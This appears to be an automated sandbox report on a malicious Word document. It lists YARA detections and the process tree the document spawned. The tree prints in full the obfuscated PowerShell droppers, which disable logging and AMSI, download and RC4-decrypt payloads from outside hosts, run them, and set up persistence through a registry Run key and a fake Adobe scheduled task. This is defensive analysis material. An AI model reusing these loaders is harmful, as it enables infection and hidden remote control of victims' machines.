0000001B.00000000.16460822174.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000000.16461111447.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468544452.00110000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16470994291.0153D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16471109913.01660000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16471226487.016C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16469158345.004B1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468815770.003E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468838264.00406000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16461517453.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16465931308.0011C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468242022.004B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468174726.004A5000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468191650.004AC000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000000.16466455838.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468206147.00481000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480249069.00400000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480203790.003E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480269231.00426000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000003.16466700886.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472465532.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472603519.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472892522.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472742485.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468140620.004B2000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473840713.00340000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473711541.00270000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473904470.00366000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16475070317.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16475268349.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000003.16473177431.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16474820967.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16474461723.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000003.16476187232.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16499978274.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500170033.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500483468.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567553929.00321000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567604876.004A0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567440908.002D0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567501646.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16501342355.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567480851.002FF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503064468.0030C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503079730.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500917401.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503118310.00306000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503179760.002D1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506373335.00327000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503265026.002F9000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506450727.0031C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506487131.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503292449.00300000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16507436398.002FD000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16503997937.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16505979814.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16503831032.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16505682606.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571554431.00098000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571520029.00070000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571590847.000AF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571752140.00440000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000003.16506433003.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16508717527.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16509432349.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16509719926.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000000.16510560264.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16572994813.00160000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573202405.004CF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573179221.004BF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573258362.004E1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573119211.00490000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16510314431.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth

Unpacked PEs

No yara matches

Screenshots

Startup

System is w7_1

WINWORD.EXE (PID: 3664 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Spiez CONVERGENCE.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)

cmd.exe (PID: 3756 cmdline: 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Sile','ntinue','o','n') ^| .('{0}{1}{2}{3}'-f'W','her','e-Obje','ct') -FilterScript {(${_}.'MO`De'[0] -eq 'd')} ^| ^&('%') {${_}.'F`UllnA`Me'}; do {${R} = ^&('{1}{0}{2}'-f 'Ran','Get-','dom') ${P`ATH}} While ((.('{0}{2}{1}' -f'Te','ath','st-P') ${R}) -and (${r}.('{1}{0}{2}'-f'owe','ToL','r').Invoke()).('{1}{0}{2}'-f 'in','Conta','s').Invoke(('{1}{0}'-f'emp','t')) -and (${r}.('{0}{1}{2}'-f'T','oL','ower').Invoke()).('{1}{0}'-f 's','Contain').Invoke('tmp') -and (${R}.('{0}{1}'-f'ToLow','er').Invoke()).('{2}{1}{0}' -f'ns','tai','Con').Invoke(('{1}{0}' -f'ache','c'))); ${s`AVE`path} = ${R}; ${Fu`Rl}=('{5}{0}{2}{6}{7}{8}{3}{4}{1}' -f'ps:','t','//mysen','ccess.log.t','x','htt','t.o','r','g/a'); ${sc`hP`AtH}=${sA`V`ep`AtH}+((('{3}{0}{1}{2}' -f'Cl','ibsy','s.hta','IT'))-replACE ([cHaR]73+[cHaR]84+[cHaR]67),[cHaR]92);.((('{1}{7}{3}{5}{6}{2}{9}{8}{0}{4}' -f 'x','C:fB9Window','m32fB9certutil','B9S','e','y','ste','sf','e','.'))-cRePLAcE 'fB9',[ChAr]92) -urlcache -split -f ${F`Url} ${s`chPa`Th} ^| .('{0}{2}{1}' -f 'Out-','ull','N');.('{0}{1}{2}{3}' -f 'Se','t-','ItemProper','ty') -Path ((('{0}{12}{6}{10}{9}{8}{5}{4}{2}{3}{1}{7}{11}{14}{13}' -f 'HKC','ntV','pCur','re','owsTZ','rosoftTZpWind',':TZ','ers','pMic','eTZ','pSoftwar','ion','U','Run','TZp')).('{0}{1}' -f'REpl','ace').Invoke('TZp','\')) -Value ${sC`hp`ATh} -Name ('{1}{3}{0}{2}{4}' -f 'lightUpdat','Silw','eCo','er','reRun');${eRro`R`Ac`T`I`oNPrEF`ErEncE} = ('{3}{2}{4}{0}{1}' -f'nu','e','tlyCo','Silen','nti');IF(${pSVErS`iOn`T`ABLe}.'p`sVE`RsIon'.'m`AjoR' -Ge 3){${G`pF}= $MZs.'AsSEmb`ly'.('{2}{1}{0}' -f 'TYpe','t','GE').Invoke(('{1}{5}{3}{4}{2}{0}{6}'-f 'n.U','System.M','matio','nagemen','t.Auto','a','tils')).'GEtFie`lD'(('{1}{0}{4}{2}{5}{3}' -f'a','c','cyS','s','chedGroupPoli','etting'),'N'+('{3}{2}{1}{0}' -f'c','i','lic,Stat','onPub'));IF(${g`pf}){${G`pC}=${G`PF}.('{0}{1}{2}' -f 'GETVA','l','Ue').Invoke(${nU`lL});IF(${G`Pc}[('{0}{1}' -f'Scrip','tB')+('{2}{0}{1}{3}'-f 'gg','in','lockLo','g')]){${G`pc}[('{2}{0}{1}' -f 'ript','B','Sc')+('{2}{1}{0}{3}' -f 'kLogg','c','lo','ing')][('{3}{2}{0}{1}' -f'bleScri','ptB','a','En')+('{1}{0}{2}'-f 'og','lockL','ging')]=0;${g`pc}[('{0}{1}' -f 'Sc','riptB')+('{2}{3}{0}{1}'-f 'kLogg','ing','l','oc')][('{0}{4}{2}{5}{1}{6}{7}{3}' -f 'Ena','o','eSc','ging','bl','riptBlockInv','ca','tionLog')]=0}${v`Al}= (^&('{2}{1}{0}'-f 'ablE','ARi','V') ('I'+'BhRw')).ValuE::('{1}{0}'-f'ew','n').Invoke();${V`Al}.('{1}{0}' -f 'd','Ad').Invoke(('{2}{0}{1}'-f 'p','tB','EnableScri')+('{2}{1}{0}' -f'ng','i','lockLogg'),0);${v`AL}.('{1}{0}'-f 'DD','A').Invoke(('{3}{4}{6}{2}{8}{7}{5}{0}{1}{9}'-f 'n','L','riptB','Enab','leS','catio','c','o','lockInv','ogging'),0);${G`PC}[((('{16}{0}{1}{17}{12}{24}{4}{2}{3}{10}{23}{13}{21}{22}{9}{8}{14}{19}{5}{15}{11}{18}{7}{6}{25}{20}'-f 'Y_L','OCA','E8','k','HIN','D','8kD','kDPowerShell','ies8kD','c','DS','ws','_','ware8kDPo','Microsoft8','Windo','HKE','L','8','k','riptB','l','i','oft','MAC','Sc'))-REpLaCe ([chAR]56+[chAR]107+[chAR]68),[chAR]92)+('{2}{1}{0}' -f 'ckLogging','o','l')]=${V`AL}}ELSe{ (.('{1}{0}'-f'I','gc') ('{1}{0}{2}'-f 'i','VaR','aBLE:7b1m') ).vaLUe.'GeTFIe`LD'(('{0}{1}{2}'-f 's','ign','atures'),'N'+('{3}{0}{1}{2}{4}' -f 't','a','t','onPublic,S','ic')).'S`ETv`ALuE'(${NU`ll},(.('{2}{1}{0}'-f'CT','-ObJE','NEw') ('{2}{5}{0}{1}{4}{7}{9}{8}{6}{3}' -f'E','Ct','Col','NG]','io','L','i','NS.GENE','sHSET[sTr','ric.HA')))} (^&('{1}{0}{2}{3}' -f 'b','geT-VARiA','L','e') ('{0}{1}' -f'mZ','S') -vAL ).'aSseM`B`LY'.('{2}{0}{1}'-f'Typ','E','GEt').Invoke(('{5}{7}{0}{1}{6}{8}{2}{4}{3}'-f'.Aut','om','AmsiUti','s','l','System.Manag','a','ement','tion.'))^|^&('?'){${_}}^|.('%'){${_}.('{1}{2}{0}'-f'IElD','G','EtF').Invoke(('{2}{0}{1}{3}'-f'iI','n','ams','itFailed'),('{4}{2}{0}{5}{1}{3}'-f'S','i','ic,','c','NonPubl','tat')).('{2}{1}{0}'-f 'e','u','SeTVal').Invoke(${n`Ull},${T`RuE})};}; ( ^&('{2}{0}{1}' -f'T-','vaRiAblE','GE') ('{1}{0}' -f'4K','0') ).valuE::'E`X`P`Ect100conTin`UE'=0;${wc}=.('{1}{0}{2}' -f 'ObJ','New-','eCT') ('{0}{2}{3}{1}'-f 'SYsteM.NeT','nT','.W','EbClIe');${u}=('{0}{2}{9}{6}{5}{1}{11}{10}{8}{3}{4}{7}'-f'Micro','17.005','soft Sk',' NT 10.','0 (162','Sync ','Drive','99)','ws','y','ndo','.0107.0008 ship; Wi');${w`C}.'HE`AdErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{2}{0}{3}' -f'r-Age','U','se','nt'),${U});${w`c}.'PRO`xy'= $nVa1I::'D`EfauLTwEB`P`RO`xy';${w`C}.'PrO`XY'.'cRe`dE`NTI`ALs' = $KmD::'de`FAUltn`et`wo`RKCREDEnTIA`LS';${scRi`pT:p`RO`XY} = ${W`c}.'pR`oXy';${k}= ( .('{2}{1}{0}' -f'LE','ARiab','V') ('{1}{0}'-f 'vm','Bq') ).vAlUE::'aSC`iI'.('{0}{1}' -f'GETBYt','es').Invoke(('{4}{3}{6}{2}{1}{0}{5}' -f'ee5aa0e8b0','7ac','d','923','d20','889bb1e','3c7d7'));${R}={${D},${K}=${a`RGS};${s}=0..255;0..255^|^&('%'){${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.'coU`Nt'])%256;${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]};${d}^|^&('%'){${i}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]}};${da`Ta}=${w`c}.('{2}{1}{0}{3}'-f'Dat','OWNloAD','D','A').Invoke(('{8}{13}{16}{9}{12}{11}{15}{2}{10}{19}{0}{7}{20}{3}{17}{5}{4}{14}{6}{1}{18}'-f '5','n','/s','b3','8/dri','U','item/co','zbTpZA','https://api.','edrive.','!ArI-XS','0/shar','com/v1.','o','ve','es','n','-dz_o','tent','G7nP','N'));${IV}=${d`ATa}[0..3];${dA`Ta}=${dA`TA}[4..${d`Ata}.'L`E`NgtH'];-JoIn[CHar[]](^& ${r} ${da`Ta} (${i`V}+${k}))^|.('{0}{1}'-f'IE','X')&& Set RBH=eChO ieX (gCi ENv:STi).VALUe ^| pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN - && C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3780 cmdline: C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH% MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe ' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 3796 cmdline: pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN - MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

certutil.exe (PID: 3832 cmdline: 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta MD5: 0D52559AEF4AA5EAC82F530617032283)

DW20.EXE (PID: 1176 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516 MD5: B15169774D98C41C0DC54257ACEC3712)

DWWIN.EXE (PID: 268 cmdline: C:\Windows\system32\dwwin.exe -x -s 1516 MD5: 5DF543E0F1EE5D50EE1865263AA61246)

WerFault.exe (PID: 2272 cmdline: C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460 MD5: 5FEAB868CAEDBBD1B7A145CA8261E4AA)

mshta.exe (PID: 4000 cmdline: 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

cmd.exe (PID: 4056 cmdline: 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'cachedGr','Setti','icy','ngs','oupPol'),'N'+('{0}{4}{2}{3}{1}' -f 'o','tic','c,St','a','nPubli'));If(${g`Pf}){${G`PC}=${g`Pf}.('{1}{0}{2}'-f 'VaL','Get','Ue').Invoke(${nu`Ll});IF(${g`pc}[('{1}{0}{2}'-f 'rip','Sc','tB')+('{0}{3}{2}{1}' -f 'lo','ogging','kL','c')]){${G`PC}[('{2}{0}{1}' -f'rip','tB','Sc')+('{2}{3}{0}{1}' -f'in','g','lockL','ogg')][('{3}{1}{0}{2}'-f 'ip','eScr','tB','Enabl')+('{0}{2}{1}'-f'lo','ing','ckLogg')]=0;${G`Pc}[('{2}{1}{0}'-f'iptB','r','Sc')+('{0}{2}{1}' -f'l','kLogging','oc')][('{3}{7}{0}{4}{2}{1}{6}{5}'-f'crip','nLo','Invocatio','Enabl','tBlock','ing','gg','eS')]=0}${V`Al}= ( VArIaBle Eip -vAL )::('{0}{1}' -f 'Ne','w').Invoke();${V`AL}.('{1}{0}'-f'dD','A').Invoke(('{0}{1}{3}{2}'-f'En','a','leScriptB','b')+('{2}{1}{0}' -f'gging','ckLo','lo'),0);${v`Al}.('{0}{1}' -f'A','Dd').Invoke(('{0}{8}{6}{5}{2}{3}{1}{4}{7}' -f 'E','Log','o','ckInvocation','g','Bl','bleScript','ing','na'),0);${g`PC}[((('{8}{12}{14}{15}{9}{5}{0}{6}{7}{3}{4}{10}{13}{1}{16}{2}{17}{11}' -f'Po','sTK','el','KSW','ind','TKS','liciesTKSMicrosof','tT','HKEY_LO','are','o','iptB','CAL_MACHIN','w','ETK','SSoftw','SPowerSh','lTKSScr'))-REpLace ([CHAR]84+[CHAR]75+[CHAR]83),[CHAR]92)+('{1}{2}{0}'-f 'ging','loc','kLog')]=${v`AL}}ELse{ ${tvr`32}.'GeTFiE`LD'(('{1}{2}{0}' -f 'es','si','gnatur'),'N'+('{2}{1}{0}'-f'Static','c,','onPubli')).('{2}{0}{1}' -f 'TV','Alue','Se').Invoke(${N`ULL},(^&('{3}{0}{1}{2}' -f 'ew-Ob','Je','ct','N') ('{4}{3}{0}{1}{2}{5}{6}' -f'Ns.','GENEric.HAShSE','t[','lLeCtIO','Co','strI','ng]')))} ( ItEM ('vARi'+'A'+'BL'+'e:gNF') ).'Va`LUE'.'aSS`EM`BLy'.('{1}{0}{2}'-f 'yp','GetT','E').Invoke(('{4}{0}{3}{6}{1}{5}{2}'-f 'anag','msi','ils','emen','System.M','Ut','t.Automation.A'))^|^&('?'){${_}}^|^&('%'){${_}.('{2}{1}{0}'-f 'd','FieL','GEt').Invoke(('{4}{0}{1}{3}{2}'-f 'a','il','d','e','amsiInitF'),('{1}{4}{2}{0}{3}' -f 'ic,Stati','NonPu','l','c','b')).('{1}{0}'-f'ue','SETVAL').Invoke(${n`ULL},${TR`Ue})};}; ( gi ('vArIabLE:rt'+'ha'+'C'+'5')).'v`AlUE'::'expEC`T`100conTin`Ue'=0;${wc}=^&('{1}{2}{0}' -f 'BjECt','NEw-','O') ('{2}{5}{3}{4}{1}{0}' -f'nt','Ie','SYST','eb','CL','EM.NET.W');${u}=('{0}{13}{12}{1}{9}{4}{8}{16}{15}{2}{14}{5}{11}{17}{7}{3}{6}{10}' -f 'Mozi','(Wind',' T','e G','ws','i','e','11.0) lik','NT','o','cko','dent/7','.0 ','lla/5','r','; WOW64;',' 6.1','.0; rv:'); ${R`TH`Ac5}::'SeRVERCEr`T`i`FiCateVALIDat`i`On`cAll`B`ACk' = {${t`Rue}};${Wc}.'HEAd`ERs'.('{1}{0}' -f 'd','Ad').Invoke(('{1}{3}{0}{2}'-f '-Ag','Us','ent','er'),${u});${wC}.'p`ROxY'= (Gci VaRIablE:qCj ).'va`lue'::'D`eFAU`ltW`EbPROXY';${Wc}.'prO`Xy'.'C`REdent`ia`LS' = ( DiR VARIable:Esy ).'Va`lUE'::'dEFAu`LtNETWoRk`C`Re`DENTIals';${k}= ( Get-vaRiablE R4Imz -VAl )::'aS`CIi'.('{0}{1}'-f 'GEtBy','tEs').Invoke(('{2}{1}{4}{6}{0}{3}{5}'-f'cee5aa0e8b08','3','d20923','89bb','c','1e','7d7d7a'));${r}={${D},${K}=${AR`Gs};${s}=0..255;0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.'COU`NT'])%256;${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};${d}^|.('%'){${I}=(${I}+1)%256;${h}=(${h}+${S}[${I}])%256;${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};${wC}.'Hea`D`ErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{0}'-f'e','Cooki'),('{6}{2}{7}{8}{3}{5}{1}{4}{0}' -f 'ZB5Q=','mklQ','ssion=B43mgp','o69GDp','pT','3P','se','Q','4N'));${S`eR}=('{1}{2}{3}{5}{4}{6}{0}'-f':443','h','ttps:','//','nt','myse','.org');${t}=('{3}{4}{2}{1}{0}'-f'min.php','d','/a','/m','odules');${d`ATA}=${w`c}.('{1}{0}{2}' -f'NLOAdDaT','DOW','A').Invoke(${S`eR}+${t});${iV}=${D`ATA}[0..3];${DA`TA}=${dA`TA}[4..${d`Ata}.'L`eN`GTh'];-JoiN[ChAR[]](^& ${R} ${da`Ta} (${IV}+${k}))^|.('{0}{1}' -f'I','EX') && sET OMWI=ecHo IEX (GI enV:Kjv).valUe ^|powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -&& CMD.ExE /C%OmWi%' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 4084 cmdline: CMD.ExE /C%OmWi% MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe ' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 2092 cmdline: powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN - MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2200 cmdline: 'C:\Windows\system32\schtasks.exe' /query MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

findstr.exe (PID: 2568 cmdline: 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore MD5: 18F02C555FBC9885DF9DB77754D6BB9B)

schtasks.exe (PID: 2460 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\'' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 2396 cmdline: 'C:\Windows\system32\schtasks.exe' /query MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

